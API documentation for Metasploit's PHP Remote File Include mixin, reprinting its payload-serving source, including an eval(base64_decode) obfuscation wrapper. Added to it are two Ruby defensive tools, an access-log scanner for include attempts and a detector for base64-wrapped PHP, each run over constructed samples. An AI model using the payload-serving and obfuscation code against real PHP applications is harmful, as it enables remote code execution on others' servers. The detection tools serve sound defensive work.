Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:
Msf::Exploit::Remote::HttpServer
Defined in:
lib/msf/core/exploit/http/server/php_include.rb

Overview

This mixin provides methods for exploiting Remote File Include vulnerabilities in PHP scripts: the module acts as an HTTP server that hosts the PHP payload the vulnerable script is made to include.

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #add_robots_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #start_service

Methods included from SocketServer

#_determine_server_comm, #cleanup, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #stop_service, #via_string_for_ip

Instance Method Details

#autofilter ⇒ Object

Because exploits of this kind are Stance::Aggressive, override HttpServer's normal non-automatic behaviour and allow the framework to run this module automatically.


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 28

def autofilter
  true
end

#exploit ⇒ Object

:category: Exploit::Remote::TcpServer overrides

Override exploit() to handle service start/stop

Disables SSL for the service, since we always want to serve our PHP payload files from a non-SSL server. There are two reasons for this:

  1. HTTPS is only supported on PHP versions after 4.3.0, and only if the OpenSSL extension is compiled in, which is a non-default configuration on most systems

  2. Somewhat less importantly, the SSL option would conflict with the same-named option used by our client when it connects to the vulnerable server


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 45

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  begin
    print_status("PHP include server started.")
    php_exploit
    ::IO.select(nil, nil, nil, 5)
  rescue ::Interrupt
    raise $!
  ensure
    stop_service
  end
end

#initialize(info = {}) ⇒ Object


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 14

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming PHP code request


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 89

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded)

Does not take SSL into account. For the reasoning behind this, see #exploit.

Returns:

  • (String)

    The URL to be used as the argument to require, require_once, include, or include_once in a vulnerable PHP application.


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 106

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end
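Because php_include_url builds a plain http:// URL (with the host bracketed for IPv6) that ends in a `?`, an include attempt of this kind shows up in the vulnerable application's access log as a request parameter whose value is itself an absolute URL. The following is an added example, not Metasploit code: a small Ruby log scanner that flags such parameters, over a few constructed log lines. It generalises slightly beyond the page, treating any scheme with a host as a hit, and records whether the value carries the trailing `?` the mixin appends. The log format, parameter names and addresses are all assumptions.

```ruby
require 'uri'
require 'cgi'

# Constructed access-log lines in Apache common-log form (not captured from a
# real server). Lines 2 and 3 carry a parameter whose value is an absolute URL
# of the shape php_include_url builds, with an IPv4 and a bracketed IPv6 host;
# line 4 merely mentions a URL inside free text and must not be flagged.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
  10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.9%3A8080%2FfOo2xZ%3F HTTP/1.1" 200 77
  10.0.0.8 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?page=http%3A%2F%2F%5B2001%3Adb8%3A%3A1%5D%3A8080%2Fabc%3F HTTP/1.1" 200 77
  10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /docs/?q=see+http://example.com HTTP/1.1" 200 2048
LOG

# The quoted request line: method, target (path plus optional query), version.
REQUEST_RE = %r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"}

# True when the whole parameter value is an absolute URL with a scheme and a
# host (URI returns IPv6 literals still bracketed, which is fine here). A value
# that merely contains a URL somewhere inside it does not count.
def remote_url_value?(value)
  return false unless value.match?(%r{\A[a-z][a-z0-9+.\-]*://}i)
  host = URI.parse(value).host
  !(host.nil? || host.empty?)
rescue URI::InvalidURIError
  false
end

# Returns a finding for the first URL-valued parameter in one log line, or nil.
# trailing_query records the '?' that php_include_url appends to its URLs.
def rfi_finding(line)
  m = REQUEST_RE.match(line)
  return nil if m.nil?
  path, _sep, query = m[:target].partition('?')
  return nil if query.empty?
  CGI.parse(query).each do |name, values|
    values.each do |v|
      next unless remote_url_value?(v)
      return { client: line.split(' ', 2).first, path: path, param: name,
               url: v, trailing_query: v.end_with?('?') }
    end
  end
  nil
end

# Scan a whole log text and return every finding, in file order.
def scan_log(text)
  text.each_line.map { |line| rfi_finding(line) }.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |f|
    puts "#{f[:client]} #{f[:path]} param=#{f[:param]} url=#{f[:url]}"
  end
end
```

The check is deliberately on the decoded parameter value as a whole rather than on a substring match, so documentation pages and search queries that mention a URL are not reported; on a real deployment the same logic would sit behind a log tail, with a hit on a parameter that is then passed to include() being the condition worth alerting on.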

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application


# File 'lib/msf/core/exploit/http/server/php_include.rb', line 72

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end
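The 'base64' branch above hides the payload inside a single eval(base64_decode('...')) statement, which is also the shape most obfuscated PHP webshells take. As an added example (not Metasploit code), here is a Ruby helper a responder can run over files pulled from a web root to recognise that wrapper, decode the literal and show what it evaluates, with the samples constructed inline around a harmless echo statement rather than taken from any real incident. The regex, the classification labels and the sample strings are all assumptions.

```ruby
require 'base64'

# Matches the wrapper shape PHP::Encode => 'base64' emits: an eval() whose
# argument is base64_decode() of a quoted literal. Whitespace inside the literal
# is tolerated because obfuscators often wrap long base64 across lines.
EVAL_B64_RE = /eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)\s*\)/

# Constructed samples (built here, not captured from any server). The first has
# the exact shape the 'base64' branch of send_php_payload produces, around a
# harmless statement; the second is the 'none' shape, which needs no decoding.
SAMPLE_ENCODED = "<?php eval(base64_decode('#{Base64.strict_encode64('echo "hello";')}'));?>"
SAMPLE_PLAIN   = "<?php echo \"hello\"; ?>"

# Returns one finding per eval(base64_decode(...)) occurrence, with the hidden
# statement decoded so an analyst can read it, plus a flag telling whether the
# decoded bytes are valid text at all (binary blobs are a stronger signal).
def find_eval_base64(source)
  findings = []
  source.scan(EVAL_B64_RE) do
    m = Regexp.last_match
    decoded = Base64.decode64(m[2].gsub(/\s+/, '')).force_encoding('UTF-8')
    findings << { offset: m.begin(0), decoded: decoded, text: decoded.valid_encoding? }
  end
  findings
end

# Coarse verdict for a file's contents: :eval_base64 when the wrapper is
# present, :php when it is plain PHP, :other otherwise.
def classify_php(source)
  return :eval_base64 unless find_eval_base64(source).empty?
  source.include?('<?php') ? :php : :other
end

if __FILE__ == $PROGRAM_NAME
  find_eval_base64(SAMPLE_ENCODED).each do |f|
    puts "offset #{f[:offset]}: #{f[:decoded].inspect} (text=#{f[:text]})"
  end
end
```

A match is a triage signal, not a verdict: legitimate software occasionally ships base64-wrapped code, so the decoded text is returned rather than a bare true/false precisely so that a reviewer can read what would have been executed.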